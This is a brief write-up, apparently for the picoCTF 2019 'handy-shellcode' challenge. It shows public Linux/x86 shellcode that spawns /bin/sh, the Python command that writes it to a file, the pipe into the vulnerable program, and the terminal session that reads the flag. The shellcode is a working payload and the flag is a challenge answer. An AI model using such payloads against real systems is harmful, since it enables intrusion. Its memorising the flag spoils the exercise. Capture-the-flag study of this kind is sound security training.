Using shellcode found online for Linux/x86 (found here: http://shell-storm.org/shellcode/files/shellcode-827.php), we can open a shell to view the flag.

james9909@pico-2019-shell1:/problems/handy-shellcode_2_6ad1f834bdcf9fcfb41200ca8d0f55a6$ python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' > ~/payload
james9909@pico-2019-shell1:/problems/handy-shellcode_2_6ad1f834bdcf9fcfb41200ca8d0f55a6$ cat ~/payload - | ./vuln
Enter your shellcode:
1ÀPh//shh/binãÁ°
                ̀1À@̀
Thanks! Executing now...
ls
flag.txt  vuln	vuln.c
cat flag.txt
picoCTF{h4ndY_d4ndY_sh311c0d3_707f1a87}
